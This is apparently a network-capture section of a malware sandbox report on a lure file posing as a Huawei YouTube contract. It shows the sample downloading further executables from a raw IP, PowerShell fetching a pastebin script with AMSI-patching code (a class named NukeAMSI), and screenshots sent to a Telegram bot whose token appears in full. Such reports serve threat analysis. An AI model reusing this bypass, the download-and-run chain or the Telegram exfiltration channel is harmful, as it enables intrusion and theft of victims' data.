                                                                                                                                                                                            2192.168.2.64982589.23.97.214802356C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Feb 17, 2025 19:35:45.872164965 CET52OUTGET /Team/BILLI.exe HTTP/1.1
                                                                                                                                                                                            Host: 89.23.97.214


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            3192.168.2.64982489.23.97.214802356C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Feb 17, 2025 19:35:45.872361898 CET51OUTGET /Team/32cv.exe HTTP/1.1
                                                                                                                                                                                            Host: 89.23.97.214


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            4192.168.2.64996089.23.97.214802356C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Feb 17, 2025 19:36:07.258047104 CET52OUTGET /Team/BILLI.exe HTTP/1.1
                                                                                                                                                                                            Host: 89.23.97.214


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            5192.168.2.64996189.23.97.214802356C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Feb 17, 2025 19:36:07.268609047 CET51OUTGET /Team/32cv.exe HTTP/1.1
                                                                                                                                                                                            Host: 89.23.97.214


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            6192.168.2.64999489.23.97.214802356C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Feb 17, 2025 19:36:28.664127111 CET51OUTGET /Team/32cv.exe HTTP/1.1
                                                                                                                                                                                            Host: 89.23.97.214


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            7192.168.2.64999589.23.97.214802356C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Feb 17, 2025 19:36:28.665585995 CET52OUTGET /Team/BILLI.exe HTTP/1.1
                                                                                                                                                                                            Host: 89.23.97.214


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            8192.168.2.64999989.23.97.214802356C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Feb 17, 2025 19:36:50.036993980 CET51OUTGET /Team/32cv.exe HTTP/1.1
                                                                                                                                                                                            Host: 89.23.97.214


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            9192.168.2.64999889.23.97.214802356C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Feb 17, 2025 19:36:50.037058115 CET52OUTGET /Team/BILLI.exe HTTP/1.1
                                                                                                                                                                                            Host: 89.23.97.214


                                                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            0192.168.2.649706172.67.19.24443876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2025-02-17 18:35:26 UTC169OUTGET /raw/WHKzW2nr HTTP/1.1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                            Host: pastebin.com
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            2025-02-17 18:35:26 UTC391INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 17 Feb 2025 18:35:26 GMT
                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            x-frame-options: DENY
                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                            x-xss-protection: 1;mode=block
                                                                                                                                                                                            cache-control: public, max-age=1801
                                                                                                                                                                                            CF-Cache-Status: EXPIRED
                                                                                                                                                                                            Last-Modified: Mon, 17 Feb 2025 18:35:26 GMT
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 9137e08ff96032e4-EWR
                                                                                                                                                                                            2025-02-17 18:35:26 UTC978INData Raw: 31 37 33 37 0d 0a 0d 0a 0d 0a 41 64 64 2d 54 79 70 65 20 2d 54 79 70 65 44 65 66 69 6e 69 74 69 6f 6e 20 40 22 0d 0a 75 73 69 6e 67 20 53 79 73 74 65 6d 3b 0d 0a 75 73 69 6e 67 20 53 79 73 74 65 6d 2e 44 69 61 67 6e 6f 73 74 69 63 73 3b 0d 0a 75 73 69 6e 67 20 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 3b 0d 0a 0d 0a 70 75 62 6c 69 63 20 63 6c 61 73 73 20 4e 75 6b 65 41 4d 53 49 0d 0a 7b 0d 0a 20 20 20 20 70 75 62 6c 69 63 20 63 6f 6e 73 74 20 69 6e 74 20 50 52 4f 43 45 53 53 5f 56 4d 5f 4f 50 45 52 41 54 49 4f 4e 20 3d 20 30 78 30 30 30 38 3b 0d 0a 20 20 20 20 70 75 62 6c 69 63 20 63 6f 6e 73 74 20 69 6e 74 20 50 52 4f 43 45 53 53 5f 56 4d 5f 52 45 41 44 20 3d 20 30 78 30 30 31 30 3b 0d 0a 20 20 20 20 70 75
                                                                                                                                                                                            Data Ascii: 1737Add-Type -TypeDefinition @"using System;using System.Diagnostics;using System.Runtime.InteropServices;public class NukeAMSI{ public const int PROCESS_VM_OPERATION = 0x0008; public const int PROCESS_VM_READ = 0x0010; pu
                                                                                                                                                                                            2025-02-17 18:35:26 UTC1369INData Raw: 74 72 20 48 61 6e 64 6c 65 29 3b 0d 0a 0d 0a 20 20 20 20 2f 2f 20 4c 6f 61 64 4c 69 62 72 61 72 79 3a 20 4c 6f 61 64 73 20 74 68 65 20 73 70 65 63 69 66 69 65 64 20 6d 6f 64 75 6c 65 20 69 6e 74 6f 20 74 68 65 20 61 64 64 72 65 73 73 20 73 70 61 63 65 20 6f 66 20 74 68 65 20 63 61 6c 6c 69 6e 67 20 70 72 6f 63 65 73 73 2e 0d 0a 20 20 20 20 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 20 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 29 5d 0d 0a 20 20 20 20 70 75 62 6c 69 63 20 73 74 61 74 69 63 20 65 78 74 65 72 6e 20 49 6e 74 50 74 72 20 4c 6f 61 64 4c 69 62 72 61 72 79 28 73 74 72 69 6e 67 20 6c 70 46 69 6c 65 4e 61 6d 65 29 3b 0d 0a 0d 0a 20 20 20 20 2f 2f 20 47 65 74 50 72 6f 63 41 64 64 72 65 73 73 3a 20 52
                                                                                                                                                                                            Data Ascii: tr Handle); // LoadLibrary: Loads the specified module into the address space of the calling process. [DllImport("kernel32.dll", SetLastError = true)] public static extern IntPtr LoadLibrary(string lpFileName); // GetProcAddress: R
                                                                                                                                                                                            2025-02-17 18:35:26 UTC1369INData Raw: 73 73 49 64 0d 0a 20 20 20 20 29 0d 0a 0d 0a 20 20 20 20 57 72 69 74 65 2d 48 6f 73 74 20 22 4d 6f 64 69 66 79 69 6e 67 20 41 4d 53 49 20 66 6f 72 20 70 72 6f 63 65 73 73 20 49 44 3a 20 24 70 72 6f 63 65 73 73 49 64 22 20 2d 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 20 43 79 61 6e 0d 0a 0d 0a 20 20 20 20 24 70 61 74 63 68 20 3d 20 5b 62 79 74 65 5d 30 78 45 42 20 20 23 20 54 68 65 20 70 61 74 63 68 20 62 79 74 65 20 74 6f 20 6d 6f 64 69 66 79 20 41 4d 53 49 20 62 65 68 61 76 69 6f 72 0d 0a 0d 0a 20 20 20 20 24 6f 62 6a 65 63 74 41 74 74 72 69 62 75 74 65 73 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 4e 75 6b 65 41 4d 53 49 2b 4f 42 4a 45 43 54 5f 41 54 54 52 49 42 55 54 45 53 0d 0a 20 20 20 20 24 63 6c 69 65 6e 74 49 64 20 3d 20 4e 65 77 2d 4f 62 6a 65
                                                                                                                                                                                            Data Ascii: ssId ) Write-Host "Modifying AMSI for process ID: $processId" -ForegroundColor Cyan $patch = [byte]0xEB # The patch byte to modify AMSI behavior $objectAttributes = New-Object NukeAMSI+OBJECT_ATTRIBUTES $clientId = New-Obje
                                                                                                                                                                                            2025-02-17 18:35:26 UTC1369INData Raw: 57 72 69 74 65 2d 48 6f 73 74 20 22 46 61 69 6c 65 64 20 74 6f 20 66 69 6e 64 20 41 6d 73 69 4f 70 65 6e 53 65 73 73 69 6f 6e 20 66 75 6e 63 74 69 6f 6e 20 69 6e 20 61 6d 73 69 2e 64 6c 6c 2e 22 20 2d 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 20 52 65 64 0d 0a 20 20 20 20 20 20 20 20 5b 4e 75 6b 65 41 4d 53 49 5d 3a 3a 4e 74 43 6c 6f 73 65 28 24 68 48 61 6e 64 6c 65 29 0d 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 23 20 43 61 6c 63 75 6c 61 74 65 20 74 68 65 20 63 6f 72 72 65 63 74 20 70 61 74 63 68 20 61 64 64 72 65 73 73 20 62 79 20 6f 66 66 73 65 74 74 69 6e 67 20 66 72 6f 6d 20 41 6d 73 69 4f 70 65 6e 53 65 73 73 69 6f 6e 20 66 75 6e 63 74 69 6f 6e 0d 0a 20 20 20 20 24 70 61 74 63 68 41 64 64 72 20 3d
                                                                                                                                                                                            Data Ascii: Write-Host "Failed to find AmsiOpenSession function in amsi.dll." -ForegroundColor Red [NukeAMSI]::NtClose($hHandle) return } # Calculate the correct patch address by offsetting from AmsiOpenSession function $patchAddr =
                                                                                                                                                                                            2025-02-17 18:35:26 UTC866INData Raw: 6f 6e 2e 2e 2e 22 20 2d 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 20 43 79 61 6e 0d 0a 20 20 20 20 24 72 65 73 74 6f 72 65 53 74 61 74 75 73 20 3d 20 5b 4e 75 6b 65 41 4d 53 49 5d 3a 3a 56 69 72 74 75 61 6c 50 72 6f 74 65 63 74 45 78 28 24 68 48 61 6e 64 6c 65 2c 20 24 70 61 74 63 68 41 64 64 72 2c 20 24 73 69 7a 65 2c 20 24 6f 6c 64 50 72 6f 74 65 63 74 2c 20 5b 72 65 66 5d 24 6f 6c 64 50 72 6f 74 65 63 74 29 0d 0a 0d 0a 20 20 20 20 69 66 20 28 2d 6e 6f 74 20 24 72 65 73 74 6f 72 65 53 74 61 74 75 73 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 57 72 69 74 65 2d 48 6f 73 74 20 22 46 61 69 6c 65 64 20 74 6f 20 72 65 73 74 6f 72 65 20 6d 65 6d 6f 72 79 20 70 72 6f 74 65 63 74 69 6f 6e 2e 22 20 2d 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 20 52 65 64 0d 0a
                                                                                                                                                                                            Data Ascii: on..." -ForegroundColor Cyan $restoreStatus = [NukeAMSI]::VirtualProtectEx($hHandle, $patchAddr, $size, $oldProtect, [ref]$oldProtect) if (-not $restoreStatus) { Write-Host "Failed to restore memory protection." -ForegroundColor Red
                                                                                                                                                                                            2025-02-17 18:35:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            1192.168.2.649792149.154.167.2204432356C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2025-02-17 18:35:42 UTC230OUTPOST /bot7529774093:AAF3iNvYZOShB_j-3WVxQo0gVFdczpL8Wu8/sendPhoto?chat_id=-4642404996 HTTP/1.1
                                                                                                                                                                                            Host: api.telegram.org
                                                                                                                                                                                            Content-Type: multipart/form-data; boundary="e4a0611f-b7c4-4266-9d16-9a0547683bdd"
                                                                                                                                                                                            Content-Length: 694321
                                                                                                                                                                                            2025-02-17 18:35:42 UTC3866OUTData Raw: 2d 2d 65 34 61 30 36 31 31 66 2d 62 37 63 34 2d 34 32 36 36 2d 39 64 31 36 2d 39 61 30 35 34 37 36 38 33 62 64 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 70 68 6f 74 6f 3b 20 66 69 6c 65 6e 61 6d 65 3d 32 30 32 35 2d 30 32 2d 31 37 2d 31 33 2d 33 35 2d 33 39 2d 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 32 30 32 35 2d 30 32 2d 31 37 2d 31 33 2d 33 35 2d 33 39 2d 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00
                                                                                                                                                                                            Data Ascii: --e4a0611f-b7c4-4266-9d16-9a0547683bddContent-Disposition: form-data; name=photo; filename=2025-02-17-13-35-39-screenshot.png; filename*=utf-8''2025-02-17-13-35-39-screenshot.pngPNGIHDRCsRGBgAMAapHYs
                                                                                                                                                                                            2025-02-17 18:35:42 UTC16355OUTData Raw: 6b c5 98 00 1c 19 9e e4 6b 85 15 80 bd 90 80 63 02 b0 33 c6 04 60 77 02 30 a7 5b 01 68 c5 5d 83 98 8b 31 e4 5f 2e 00 41 63 c5 f2 b1 f6 51 5f 63 61 c7 ed 04 a0 90 90 13 12 80 9a 57 75 a0 e6 25 ee 9a d1 4e 00 4a 32 d2 4f 73 19 b9 04 ac 04 20 2f 01 89 34 7b 09 48 3b f1 67 f1 8e 00 ab 8f fc e3 39 80 12 80 88 3d 2b 00 f3 18 7d c9 bf 34 76 a4 9f 05 89 67 ab 00 69 2d b6 e2 0f ac 00 64 1d 32 0f 81 67 ab f9 34 06 c9 40 7b 2c 98 b1 8d 2b 57 32 d0 ae b7 b2 4f f2 4f 31 64 9f da 24 f9 ca 39 a4 9f 9e 19 58 e5 67 22 0f 79 07 88 3c 89 40 f5 c1 1e 0d 66 8e 5c 8e 0c 23 10 95 4b 8b ec 43 fc d9 0a c0 d4 96 02 10 c1 57 9b 7e 47 92 79 3a ee ab 39 62 12 7f 92 7f b9 00 a4 ea 8f 8a 3f 55 ff a9 02 90 f1 24 3e 5b 29 fc 20 97 80 60 45 20 fd 3c cf 0a 3e 2b 00 15 17 8c 55 2d 48 0e b9
                                                                                                                                                                                            Data Ascii: kkc3`w0[h]1_.AcQ_caWu%NJ2Os /4{H;g9=+}4vgi-d2g4@{,+W2OO1d$9Xg"y<@f\#KCW~Gy:9b?U$>[) `E <>+U-H
                                                                                                                                                                                            2025-02-17 18:35:42 UTC16355OUTData Raw: fa 6f f5 60 f5 5f 58 79 41 12 80 92 58 5b 9c 77 58 25 a4 ee 5b ba 24 dc bb 68 61 78 f2 89 c7 c3 fd 4b ee 68 10 7c 0f 3d bb 3a cc fa f1 8b e1 c7 f7 af 1b 55 01 e8 cd 8f 14 2b ed 72 10 7f fa a5 2a 40 55 06 d2 7e ec 98 1d 87 ac 11 fa de 3e 0a 02 f0 22 04 a0 f3 0c c0 46 f1 17 db 77 7f 1b d6 bc fe 4e f8 93 ef 3d 11 3e 76 c2 f2 b0 3a f6 db cb 3f 28 de fc eb 0a c0 53 c6 04 a0 90 fc 13 12 77 bd c2 93 7e 16 4f e0 f5 02 4f f6 79 e4 82 af 1d 95 d8 8b fd 4d 59 00 56 38 b2 cf 63 34 e4 1f 78 d2 cf e2 49 bd 6e f0 a5 9f 65 a8 e0 eb 06 4f fa 59 3c c1 d7 09 9e cc 1b 0e b9 00 1c ae 04 1c 13 80 3e ae d4 eb 86 4c f0 b5 c3 93 7d 1e ae ec f3 30 a2 af 15 b9 e0 83 56 f3 9d 0a c0 71 5f 7c dc 15 7d cd b0 d2 2f 27 97 7f 89 52 ee 59 c9 97 0b 3d 3b c7 b8 9d f4 b3 48 ea 89 66 42 30 8f
                                                                                                                                                                                            Data Ascii: o`_XyAX[wX%[$haxKh|=:U+r*@U~>"FwN=>v:?(Sw~OOyMYV8c4xIneOY<>L}0Vq_|}/'RY=;HfB0
                                                                                                                                                                                            2025-02-17 18:35:42 UTC16355OUTData Raw: 16 15 80 71 8f 99 71 6d 6c fb 76 5f 10 fa f7 58 98 c6 13 f7 89 f7 1c 5b 62 03 7b c6 75 06 72 69 99 93 2c 44 20 aa 2a 30 09 c2 4c 0a 22 ee 54 1d 28 89 87 dc 23 8f a3 bc c4 26 ce 8c 3f 87 5d 8b e3 bd cc e9 f9 82 ca b3 54 f1 52 ec 21 f4 f2 ea 3e 5b 15 68 f3 92 f8 9b 71 77 42 39 c4 98 4f 55 81 71 7d 15 db b9 78 f6 9f 64 a0 e4 1f 70 44 58 c2 d0 ce 11 63 0d 47 84 25 17 55 3d 08 5a 0f 12 86 92 86 88 c1 da 8e 45 15 1e cf e7 a3 45 ac 71 4c 17 99 06 3a b6 2b b9 66 63 8a 4b c8 e5 82 4e b9 9a d3 3c 71 ad b3 7d e5 08 dd 8f f6 21 46 4b 9c a3 c1 cc b1 9f 2a 09 b5 87 c6 da 97 9c 74 dd 12 64 1c d8 31 92 4e 42 90 16 79 47 ab ca be 54 e5 37 2d fe ac a7 c4 ef 6d fb 38 1f 19 b7 63 dc 23 8e 81 fe 84 9d e2 cf 69 ea fc 84 cd 1b d8 21 5e 23 ce b1 be 6f bb 3b aa 7c fa cc 01 31 5a
                                                                                                                                                                                            Data Ascii: qqmlv_X[b{uri,D *0L"T(#&?]TR!>[hqwB9OUq}xdpDXcG%U=ZEEqL:+fcKN<q}!FK*td1NByGT7-m8c#i!^#o;|1Z
                                                                                                                                                                                            2025-02-17 18:35:42 UTC16355OUTData Raw: 67 7c 27 f4 ef 7c 56 aa d8 a2 32 b0 9e be d7 7f 13 66 dd 52 e6 f0 bc c6 69 1c b1 3e a3 ca 49 12 8d d8 d4 c8 27 4c 35 19 71 62 9f 9f 17 63 eb ca 37 ee f2 6c 3a bd 7d b7 ec 7f ef dc 42 ec b5 79 53 70 df 9c c8 f7 11 6c 27 14 42 0b 69 85 54 aa c4 5a f9 f9 90 49 c8 29 3d 23 f0 af 3f 11 db dd 0a 19 8a f4 e3 67 75 d8 4d c5 7a 8e c5 22 d2 d2 7d c7 65 55 e5 9b fd 39 47 ec 77 89 88 3b 94 f5 71 3f 8e f6 6e 75 78 f1 fc bf ef 2d 0d b3 2f b9 aa 10 80 1c 03 4e f7 58 fe 5e 43 00 fe 39 2f 66 e1 19 92 92 8c b5 30 eb c6 98 80 1c a3 92 30 bd 30 24 7e af cf c5 18 df 6b 12 8f dc 47 29 df 18 a7 cf 76 66 7a 5e 5e ba 2e c2 d0 11 80 b5 b9 0f 87 d9 47 9c 50 48 b8 7f b7 7d 92 97 e9 79 80 71 8f e4 da d8 83 ef e6 cf ff b6 f8 d9 22 07 f3 fd 39 0e cc cb 3f f8 ee 90 9f 08 cf 98 43 85 20
                                                                                                                                                                                            Data Ascii: g|'|V2fRi>I'L5qbc7l:}BySpl'BiTZI)=#?guMz"}eU9Gw;q?nux-/NX^C9/f000$~kG)vfz^^.GPH}yq"9?C
                                                                                                                                                                                            2025-02-17 18:35:42 UTC16355OUTData Raw: 92 e7 d8 4a c2 63 4f 00 06 f9 b7 2f 00 b7 92 be c3 0a 64 7b ee 8c f2 d7 ac 90 c9 bd 65 98 92 7f 40 6c 05 a2 00 cc 44 e0 fa a5 77 55 a2 08 a4 0f 35 ce 77 05 93 db 85 ad 00 cc 44 e0 b4 10 9c ae fe 53 fe 8d 02 ae f4 89 6d 9c d3 13 45 e0 be 00 cc a5 5f 24 93 6f c7 02 fb 02 b0 a7 15 7b 2d 6b 08 3b c4 dd 8c f8 22 8e 25 f9 07 fb 02 b0 ac df 45 32 99 b7 1d 32 e9 17 c9 e4 de 32 64 b2 2f 23 93 7a ab 90 c9 3f c8 24 df 3c d6 12 c9 37 8f 9d c8 3f d8 53 f9 07 89 dc 5b 86 7b 8b 00 6c b1 02 30 72 6f 16 80 8a bf 2a ff 88 29 ec 9a 23 c0 c6 c7 f9 21 be 88 98 9f 09 40 c5 5f 2b 00 95 7c ad f8 13 c5 5f ec a7 3c f7 8b 15 25 9f 18 8f 73 0a bd 76 9c e5 b6 39 b4 51 10 d2 27 ee e5 1e 99 c4 83 59 31 99 92 78 4d 9e 30 b7 45 f8 95 38 cf 54 06 ce 12 80 54 ff d1 47 c8 b5 42 8f ea 3f 65
                                                                                                                                                                                            Data Ascii: JcO/d{e@lDwU5wDSmE_$o{-k;"%E222d/#z?$<7?S[{l0ro*)#!@_+|_<%sv9Q'Y1xM0E8TTGB?e
                                                                                                                                                                                            2025-02-17 18:35:42 UTC16355OUTData Raw: ce ec 85 da 2c 39 17 a5 5f 94 74 99 f4 8b c4 5c c8 f6 87 36 0f 52 11 37 83 2c 77 37 c9 c4 5f 64 5f 00 ce 27 97 7e 91 f2 1e bb c4 be 00 5c cc 3d 21 00 e7 49 c0 4c f2 2d e2 58 15 80 10 e5 df a6 e4 3b 76 04 60 cb fd 51 00 2a ff 96 11 80 99 f8 8b b4 32 af 15 80 8b 40 fe c1 24 93 7f 09 b1 32 30 63 2f 04 20 64 f2 0f a2 d0 53 e4 55 31 37 8c db f9 48 cc a3 bf aa fc 83 58 15 d8 0a 40 50 00 ce 22 93 80 88 bd c8 3c 01 a8 d8 8b 02 50 f9 47 9f b9 38 76 5e 09 18 65 1d 7d 05 a0 12 30 f6 53 98 2b 58 79 18 e7 dc cf 67 d4 8a c1 e1 db 7f 54 04 1e 7e 76 79 ef 67 94 f5 05 24 20 44 01 08 08 c0 c3 cf 28 73 4f 2b ef 52 40 da d1 2a f2 14 7d 51 00 c6 98 63 25 60 94 83 b4 6b a7 5e 53 c9 44 60 2f 03 3f 57 41 f8 45 d6 4e bd aa 9b 3c f1 b3 75 0d a2 90 8a 40 44 9f 47 84 61 8d 6a 37 c4
                                                                                                                                                                                            Data Ascii: ,9_t\6R7,w7_d_'~\=!IL-X;v`Q*2@$20c/ dSU17HX@P"<PG8v^e}0S+XygT~vyg$ D(sO+R@*}Qc%`k^SD`/?WAEN<u@DGaj7
                                                                                                                                                                                            2025-02-17 18:35:42 UTC16355OUTData Raw: 02 50 c9 17 05 60 94 7f b4 56 05 32 06 2b 02 c9 47 fa a5 15 80 83 08 6c 05 20 50 11 c8 ed c0 c0 25 1f d0 0a 40 a1 ea cf 8a bf 98 8b dc a3 1a 70 de fa 2a 09 9f 7a ed 08 e2 2f ca 3f 6f 03 e6 28 30 28 08 95 86 e4 b8 46 c8 9b 3c f1 b3 b5 65 be bd e4 43 f1 47 9f b8 e3 88 73 f5 f8 70 69 3d f2 1b 05 20 63 fa 4a 40 a5 1d 73 c4 19 3b c7 b8 ca bc b2 46 d1 17 e5 9f 18 8f 28 fb a2 dc a3 5f ab fb ca 9c e3 36 47 31 18 ab f8 10 77 51 fe 45 94 7b 51 f2 29 0f ed c7 38 2d 02 d0 aa bf 58 05 a8 08 8c b7 03 9b 43 9f 18 a2 0e 19 d8 0a 40 2b f8 8c c7 71 46 26 fe a2 14 54 26 2a e7 14 73 8e 9d 13 c6 40 4e cc 45 f4 29 00 81 39 5b 73 5c 63 15 20 64 02 d0 ca 3d fa 8a 3f c6 19 0a 3d a4 a1 c2 8f 7c 45 a1 f1 36 7f cc 25 5e 5a 68 05 20 6d 26 00 9d 73 1d f3 99 d8 33 df 3c 24 21 95 82 71
                                                                                                                                                                                            Data Ascii: P`V2+Gl P%@p*z/?o(0(F<eCGspi= cJ@s;F(_6G1wQE{Q)8-XC@+qF&T&*s@NE)9[s\c d=?=|E6%^Zh m&s3<$!q
                                                                                                                                                                                            2025-02-17 18:35:42 UTC12905OUTData Raw: 10 a8 fc e3 99 7f b4 3a 1e ac 39 89 40 3f 96 90 93 ac 43 ca d1 4a e4 69 cc 3c 12 4f 47 79 89 21 03 b7 d9 c9 7e 87 ad 25 a6 7d 24 00 95 4b 5c 6b 81 e3 c1 b4 4d bc a9 ee 93 d8 03 5f 15 a8 67 03 7a e9 a7 35 c4 57 04 60 20 f5 46 21 92 72 cb 49 af cc 9b 4b b4 c6 13 cb bb 71 d0 bc 7e 24 00 45 16 63 41 dc 53 8b b4 97 2a 91 fc 83 50 f6 45 04 72 6e 39 88 a4 9f 27 92 6d 3e b6 a5 f1 b2 6e 29 88 a5 de 28 d8 ef f9 12 48 c0 48 fe c1 b8 04 a0 9e 21 e8 89 f2 bc 0c 94 00 f4 12 d0 4b 3f 5f 09 98 2f 04 b1 78 3b 2e cf 0e 44 02 66 ae 78 31 4d 5e de 54 07 ae ba 82 8a 41 64 e1 73 6d 75 60 2b 04 5b f9 57 aa 03 cf 79 a2 e2 b1 50 cc 2d 17 a1 f4 73 4c 9c 35 98 58 ea 8d 42 2c ee c6 45 24 fd 3c 5e f4 f5 63 45 00 da eb f6 11 80 f3 11 49 bf 51 88 a4 9f 27 92 7f 10 c9 be 88 ad 5d 00 72
                                                                                                                                                                                            Data Ascii: :9@?CJi<OGy!~%}$K\kM_gz5W` F!rIKq~$EcAS*PErn9'm>n)(HH!K?_/x;.Dfx1M^TAdsmu`+[WyP-sL5XB,E$<^cEIQ']r
                                                                                                                                                                                            2025-02-17 18:35:42 UTC16355OUTData Raw: 2a d7 bd b9 00 00 ff f4 49 44 41 54 92 e8 35 3d d1 1a 4f 24 ed c6 49 2c fd 3c f6 1d 0e c0 0b be f9 88 05 df e2 e8 5c f4 f4 40 c6 29 00 6b 22 21 58 b7 f9 68 b0 f0 32 b0 08 c1 f6 d9 81 ae 3a 50 15 82 dc 2a ac e7 07 ae b2 7c 3e 07 ef c9 3f 3b 30 3f 37 50 cf 0c e4 f9 81 82 f1 d9 4f d8 bf bf 2b 21 e7 a4 9f a7 47 00 16 f9 07 cc d5 7b 8c c2 cb 51 00 7a 42 e9 e7 f9 84 ed 51 c9 3f 51 cb bc 85 10 49 3f 4f 24 fd 3c 91 f4 f3 44 d2 6e 9c d4 02 af 1f b5 d8 13 f3 e5 d5 17 8b 8c 43 00 c2 b8 c5 9f 98 23 00 3f 30 97 89 13 1f 6c 89 62 9e 39 02 10 69 37 10 5b e7 d0 51 e0 7e 02 70 98 23 c0 5e e4 79 06 cd d5 2c 58 00 96 a3 bc 0b 65 3e 01 58 0b 3f 51 e7 78 d1 e7 c7 ca a7 5f cb 3f 62 54 ff 21 f2 84 24 5e f7 c8 ef cc 4a 3c 87 97 7b a3 08 c0 2c fb 6c 0c 12 81 b9 7f 38 55 80 b3 4c
                                                                                                                                                                                            Data Ascii: *IDAT5=O$I,<\@)k"!Xh2:P*|>?;0?7PO+!G{QzBQ?QI?O$<DnC#?0lb9i7[Q~p#^y,Xe>X?Qx_?bT!$^J<{,l8UL
                                                                                                                                                                                            2025-02-17 18:35:44 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                                                                            Date: Mon, 17 Feb 2025 18:35:44 GMT
                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                            Content-Length: 58
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            2192.168.2.650001149.154.167.2204432356C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2025-02-17 18:37:11 UTC174OUTPOST /bot7529774093:AAF3iNvYZOShB_j-3WVxQo0gVFdczpL8Wu8/sendMessage HTTP/1.1
                                                                                                                                                                                            Host: api.telegram.org
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            Content-Length: 253
